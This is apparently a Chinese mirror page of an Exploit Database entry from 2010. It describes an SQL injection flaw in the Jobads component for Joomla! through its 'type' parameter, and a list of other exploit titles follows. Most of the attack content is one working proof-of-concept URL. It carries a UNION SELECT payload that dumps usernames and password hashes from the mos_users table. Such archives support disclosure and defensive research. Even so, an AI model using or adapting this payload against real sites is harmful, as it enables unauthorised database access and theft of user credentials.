Joomla! Component Jobads – ‘type’ SQL Injection

Exploit Database
127 阅读

作者： N0KT4

日期： 2010-01-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33478/

source: https://www.securityfocus.com/bid/37686/info

The Jobads component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_jobads&task=view&type=-999+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+mos_users--

last Exploits
Joomla! Component Jobads – ‘type’ SQL Injection的更多信息

Live CMS – SQL Injection：
ZeusCart 4.0 – Cross-Site Request Forgery (Deactivate Customer Accounts)：
WordPress Plugin Bannerize 2.8.6 – SQL Injection：
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation：
TeamCity Agent XML-RPC 10.0 – Remote Code Execution：
IBM Business Process Manager – User Account Reconfiguration：
PHP-Fusion Mod Mg User Fotoalbum 1.0.1 – SQL Injection：
Joomla! Component Staff Master 1.0 RC 1 – SQL Injection：